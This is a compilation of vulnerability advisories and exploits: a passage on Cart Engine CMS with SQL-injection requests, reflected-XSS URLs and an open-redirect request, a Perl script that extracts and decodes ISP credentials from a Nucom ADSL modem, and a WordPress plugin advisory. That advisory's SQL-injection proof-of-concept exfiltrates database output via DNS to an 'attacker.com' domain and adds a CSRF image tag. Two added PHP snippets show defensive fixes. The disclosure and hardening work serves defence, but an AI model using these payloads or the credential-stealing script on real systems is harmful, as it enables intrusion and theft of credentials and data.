## HTTP REQUEST - injection on item_id[0] parameter ## POST /cart.php HTTP/1.1 Host: eshop.hacme.hac User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://eshop.hacme.hac/detail.php?item_id=8 Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347 Content-Length: 774 -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="AXSRF_token" -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="cmd" add -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="item_id[0]" 8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a) AND 'ql'='ql -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="qty[0]" 1 -----------------------------109606523931762158449252347 Content-Disposition: form-data; name="qty[0]" 1 -----------------------------109606523931762158449252347-- ## EOF HTTP REQUEST ## ## HTTP REQUEST - injection on item_id[] parameter ## POST /cart.php HTTP/1.1 Host: eshop.hacme.hac User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://eshop.hacme.hac/detail.php?item_id=13 Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------1948855485207142787318084006 Content-Length: 2353 
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="AXSRF_token"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="cmd"

add
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[0]"

13
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_3"

3
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_12"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"

' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a) AND 'ql'='ql
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006--
## EOF HTTP REQUEST ##

= Reflected XSS =

A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine CMS. In the file "skins/default/outline.tpl", the parameter "path" in section "drop down TOP menu (with path)" and the parameter "$print_this_page" in section "footer_content_block" are not sanitized, so an XSS attack can be executed on multiple pages.

## HTTP REQUESTS ##
/index.php?"><script>alert('XSS')<%2fscript>
/index.php?'%3balert('XSS')%2f%2f
/checkout.php?%27%3balert%28%27XSS%27%29%2f%2f
/checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/contact.php?"><script>alert('XSS')<%2fscript>
/contact.php?'%3balert('XSS')%2f%2f
/detail.php?item_id=10&'%3balert('XSS')%2f%2f
/detail.php?item_id=10&"><script>alert('XSS')<%2fscript>
/distro.php?'%3balert('XSS')%2f%2f
/distro.php?"><script>alert('XSS')<%2fscript>
/newsletter.php?'%3balert('XSS')%2f%2f
/newsletter.php?"><script>alert('XSS')<%2fscript>
/page.php?pid=2&"><script>alert('XSS')<%2fscript>
/page.php?pid=2&'%3balert('XSS')%2f%2f
/profile.php?"><script>alert('XSS')<%2fscript>
/profile.php?'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&"><script>alert('XSS')<%2fscript>
/sitemap.php?'%3balert('XSS')%2f%2f
/sitemap.php?"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&'%3balert('XSS')%2f%2f
/tell.php?'%3balert('XSS')%2f%2f
/tell.php?"><script>alert('XSS')<%2fscript>
## EOF HTTP REQUEST ##

= Open Redirect =

An Open Redirect vulnerability has been detected on multiple pages in Cart Engine CMS. The function "redir" in file "includes/function.php" doesn't check the "$_SERVER['HTTP_REFERER']" parameter, so an Open Redirect attack can be executed.

## HTTP REQUEST ##
GET /page.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=
Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6
Connection: close

$ cat openredirect.req | nc -vvv eshop.hacme.hac 80
hacme.hac [10.0.2.80] 80 (http) open
HTTP/1.1 302 Found
Date: Sun, 10 Aug 2014 15:16:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.google.com/search?hl=en&q=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
sent 403, rcvd 380

=== Solution ===
Upgrade to Cart Engine 4.0.

=== Disclosure Timeline ===
2014-08-08 – Vulnerability Discovered
2014-08-10 – Initial vendor notification
2014-08-20 – The vendor fixed the vulnerability
2014-09-15 – Public advisory

=== References ===
[1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
[2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
[3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet

Source
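A defender-side example, added here and not Cart Engine's own code, showing how the two outline.tpl XSS sinks and the referer-based redir() described in the advisory would be hardened. The names redir(), $path and $print_this_page are the advisory's; SITE_HOST, the helper names and the shape of the template markup are assumptions, since the advisory does not show the vendor's fix.

```php
<?php
// Added example, not Cart Engine's code. redir(), $path and $print_this_page are
// the names used in the advisory; SITE_HOST, the helpers and the markup are assumed.
declare(strict_types=1);

const SITE_HOST = 'eshop.hacme.hac';   // host taken from the advisory's request

// --- Open redirect: honour the Referer only when it points back at this site --

/** True if $target is a site-relative path or an http(s) URL on SITE_HOST. */
function is_safe_redirect_target(string $target): bool
{
    if ($target === '' || preg_match('/[\x00-\x1f\x7f\s]/', $target) === 1) {
        return false;                        // empty, control chars, header injection
    }
    if ($target[0] === '/') {
        // "/page.php?pid=2" is fine; "//other.example" and "/\other" are not.
        return !isset($target[1]) || ($target[1] !== '/' && $target[1] !== '\\');
    }
    $parts = parse_url($target);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;                        // "javascript:", "data:", or unparsable
    }
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true)
        && strcasecmp($parts['host'], SITE_HOST) === 0;
}

/**
 * Hardened redir(): the Referer header is attacker-controlled, so it is used
 * only when it is same-site; anything else goes to $fallback. The chosen
 * Location is returned so the decision can be checked without sending headers.
 */
function redir(string $fallback = '/index.php'): string
{
    $referer = $_SERVER['HTTP_REFERER'] ?? '';
    $target  = is_safe_redirect_target($referer) ? $referer : $fallback;
    if (PHP_SAPI !== 'cli' && !headers_sent()) {
        header('Location: ' . $target, true, 302);
    }
    return $target;
}

// --- Reflected XSS: escape for the context the value is written into ---------

/** HTML body / attribute context, e.g. the href of the "print this page" link. */
function e_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** JavaScript string-literal context, e.g. a path written into an inline <script>. */
function e_js(string $s): string
{
    $json = json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
                            | JSON_INVALID_UTF8_SUBSTITUTE);
    return $json === false ? '""' : $json;
}

/** footer_content_block: $print_this_page comes from the request URI, so escape it. */
function render_print_link(string $print_this_page): string
{
    return '<a href="' . e_html($print_this_page) . '" onclick="window.print();return false;">Print this page</a>';
}

/** drop-down TOP menu (with path): $path lands inside a script block, so JS-escape it. */
function render_path_script(string $path): string
{
    return '<script>var path = ' . e_js($path) . ';</script>';
}

// Demo on the advisory's own inputs (run with: php harden.php)
if (PHP_SAPI === 'cli') {
    echo render_print_link('/index.php?"><script>alert(\'XSS\')</script>'), "\n";
    echo render_path_script("/index.php?';alert('XSS')//"), "\n";
    $_SERVER['HTTP_REFERER'] = 'http://www.google.com/search?hl=en&q=';
    echo redir(), "\n";                      // /index.php: external referer ignored
    $_SERVER['HTTP_REFERER'] = 'http://eshop.hacme.hac/page.php?pid=2';
    echo redir(), "\n";                      // same-site referer is kept
}
```

The two escapers are deliberately separate: htmlspecialchars() neutralises the `"><script>` variant inside an attribute, but does nothing for the `';alert()//` variant that breaks out of a JavaScript string, which needs json_encode() with the HEX flags. For the redirect, comparing the parsed host against a fixed constant rather than $_SERVER['HTTP_HOST'] matters because the Host header is also client-supplied.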
-
#!/usr/bin/perl
# Exploit Author: Sebastián Magof
# Hardware: Modem Nucom ADSL R5000UNv2
# Software Version: R5TC008
# Vulnerable file: guidewan.html
# location: http://gateway/telecom_GUI/guidewan.html
# Bug: ISP usr+pwd disclosure
# Type: Local
# Date: 24/09/2014
# Vendor Homepage: http://www.nucom.hk/
# Version: 2.00(R5TC008)
# Tested on: Linux Fedora 20/Windows 7
# (\/)
# (**) Alpha (:
#(")(")
#MADE IN ARGENTINA;
#usage:perl exploit.pl

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
use MIME::Base64;

#begin
print "\n\n************************************************************\n";
print "* Modem Nucom ADSL R5000UNv2 ISP credentials disclosure *\n"; #default gateway 192.168.1.1 (Arnet Telecom ISP Argentina)
print "************************************************************\n\n";

#isp pwd disclosure file
my $url = "http://192.168.1.1/telecom_GUI/guidewan.html";

#UserAgent
my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0");

#Request.
my $req = HTTP::Request->new(GET => $url);
my $request = $ua->request($req);
my $content = $request->content();

#content: the page embeds the PPPoE credentials as JavaScript assignments
my ($pwd) = $content =~ m/pppPassword.value = '(.+)';/;
my ($usr) = $content =~ m/pppUserName.value = '(.+)';/;

#decode base64 2 times pwd;
my $encoded = $pwd;
my $decoded = decode_base64($encoded);   #decode base64 pwd;
my $decoded2 = decode_base64($decoded);  #2nd base64 pwd;

#ISP usr+pwd Arnet Telecom Argentina;
print "User: $usr\n";
print "Password: $decoded2\n\n";
exit(0);
__END__

Source
-
Advisory ID: HTB23231
Product: All In One WP Security WordPress plugin
Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy
Vulnerable Version(s): 3.8.2 and probably prior
Tested Version: 3.8.2
Advisory Publication: September 3, 2014 [without technical details]
Vendor Notification: September 3, 2014
Vendor Patch: September 12, 2014
Public Disclosure: September 24, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-6242
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges; however, they can also be exploited by a non-authenticated attacker via a CSRF vector.

1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242

1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameter to the "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The PoC code below is based on the DNS Exfiltration technique and may be used to demonstrate the vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):

http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

This vulnerability could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator into visiting a web page with a CSRF exploit, e.g.:

http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameter to the "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The PoC code below is based on the DNS Exfiltration technique and may be used to demonstrate the vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):

http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

This vulnerability could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator into visiting a web page with a CSRF exploit, e.g.:

<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">

-----------------------------------------------------------------------------------------------

Solution:

Update to All In One WP Security 3.8.3

More Information:
https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.
[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Source
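A defender-side example, added here and belonging to neither Cart Engine nor All In One WP Security, covering the two SQL injection findings in this thread: the quoted payload in Cart Engine's item_id[] form field (a value, which can be bound as a parameter) and the "orderby"/"order" parameters of the WordPress plugin (identifiers, which cannot be bound and need an allowlist). The parameter names are the advisories'; the table, column names and the AXSRF_token check below are assumptions, and the demo input is constructed.

```php
<?php
// Added example, not code from Cart Engine or All In One WP Security. The
// request parameter names come from the two advisories; the items table, its
// columns and the token check are assumptions for the demo.
declare(strict_types=1);

/**
 * ORDER BY column and direction are identifiers, so they cannot be prepared-
 * statement parameters. The request value is only used to pick an entry from
 * an allowlist; the attacker's string itself never reaches the SQL text.
 */
function build_order_clause(array $query, array $allowed_columns, string $default_column): string
{
    $column = (string)($query['orderby'] ?? $default_column);
    if (!in_array($column, $allowed_columns, true)) {
        $column = $default_column;           // unknown column: fall back, do not echo it
    }
    $direction = strtoupper((string)($query['order'] ?? 'ASC')) === 'DESC' ? 'DESC' : 'ASC';
    return sprintf('ORDER BY `%s` %s', $column, $direction);
}

/**
 * item_id[] values are data: each element is coerced with intval(), so the
 * advisory's "' AND (SELECT ..." string becomes 0 and is dropped, and the
 * survivors are bound as integers into an IN list made only of placeholders.
 */
function fetch_cart_items(PDO $db, array $item_ids, string $order_clause): array
{
    $ids = array_values(array_filter(array_map('intval', $item_ids), fn (int $id): bool => $id > 0));
    if ($ids === []) {
        return [];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("SELECT item_id, name, price FROM items WHERE item_id IN ($placeholders) $order_clause");
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/**
 * The HTB advisory shows that a forged <img src=...> reaching an admin page is
 * enough to run the query. A per-session token the browser cannot forge closes
 * that path; WordPress ships check_admin_referer() for the same purpose. The
 * field name AXSRF_token is the one seen in the Cart Engine request.
 */
function csrf_token_valid(array $request, array $session): bool
{
    $sent = (string)($request['AXSRF_token'] ?? '');
    $real = (string)($session['csrf_token'] ?? '');
    return $real !== '' && hash_equals($real, $sent);
}

// Demo against an in-memory SQLite table (run with: php sql_harden.php)
if (PHP_SAPI === 'cli') {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE items (item_id INTEGER PRIMARY KEY, name TEXT, price REAL)');
    $db->exec("INSERT INTO items VALUES (13, 'widget', 9.99), (14, 'gadget', 19.99)");

    // Constructed request mirroring the advisories: a valid id, a quoted SQL
    // fragment in item_id[], and a subselect where a column name is expected.
    $post = ['item_id' => ['13', "' AND 'ql'='ql", '14'], 'AXSRF_token' => 'abc'];
    $get  = ['orderby' => '(select 1)', 'order' => 'desc'];

    echo csrf_token_valid($post, ['csrf_token' => 'abc']) ? "token ok\n" : "token rejected\n";
    $order = build_order_clause($get, ['name', 'price'], 'name');
    echo $order, "\n";                                   // ORDER BY `name` DESC
    foreach (fetch_cart_items($db, $post['item_id'], $order) as $row) {
        echo $row['item_id'], ' ', $row['name'], "\n";   // 13 widget, then 14 gadget
    }
}
```

The split between the two helpers is the whole point: a prepared statement alone would not have saved the WordPress plugin, because an ORDER BY target is not a value, and an allowlist alone would not have saved Cart Engine, because item_id[] is a value that belongs in a bound parameter. Both advisories also note the CSRF angle, which is why the token check sits beside the query code rather than being left to the template.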